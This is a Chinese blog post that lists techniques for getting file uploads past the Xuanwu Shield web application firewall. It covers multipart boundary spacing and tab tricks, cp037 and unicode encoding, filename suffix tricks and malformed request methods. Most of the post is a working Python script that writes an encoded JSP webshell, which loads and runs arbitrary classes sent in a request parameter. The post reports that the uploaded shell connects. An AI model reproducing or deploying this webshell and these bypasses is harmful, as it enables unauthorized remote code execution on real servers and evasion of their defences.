玄武盾WAF的几种绕过姿势 玄武盾WAF的几种绕过姿势

玄武盾WAF的几种绕过姿势

文件名绕过

boundary等号前后空格绕过

Content-Type: multipart/form-data;
boundary = ----WebKitFormBoundaryMJPuN1aHyzfAO2m3

boundary等号前后ascii码09绕过

Cp037编码绕过

文件名后加/绕过

畸形请求方法

文件内容绕过

unicode编码

cp037编码(脚本内置马支持后缀jsp/jspx,都可解析)

编码脚本

#python2
data = '''<?xml version="1.0" encoding="cp037"?>
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
  <jsp:declaration>
    class PERFORM extends ClassLoader {
      PERFORM(ClassLoader c) { super(c);}
      public Class bookkeeping(byte[] b) {
        return super.defineClass(b, 0, b.length);
      }
    }
    public byte[] branch(String str) throws Exception {
      Class base64;
      byte[] value = null;
      try {
        base64=Class.forName("sun.misc.BASE64Decoder");
        Object decoder = base64.newInstance();
        value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
      } catch (Exception e) {
        try {
          base64=Class.forName("java.util.Base64");
          Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
          value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
        } catch (Exception ee) {}
      }
      return value;
    }
  </jsp:declaration>
  <jsp:scriptlet>
    String cls = request.getParameter("xxoo");
    if (cls != null) {
      new PERFORM(this.getClass().getClassLoader()).bookkeeping(branch(cls)).newInstance().equals(new Object[]{request,response});
    }
  </jsp:scriptlet>
</jsp:root>'''
fcp037 = open('cp037.jsp','wb')![](https://xzfile.aliyuncs.com/media/upload/picture/20220804173607-de2cfbb4-13d8-1.png)
fcp037.write(data.encode('cp037'))

生成出来,burp选择paste from file


可以正常连接

评论 0

挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论
sitemap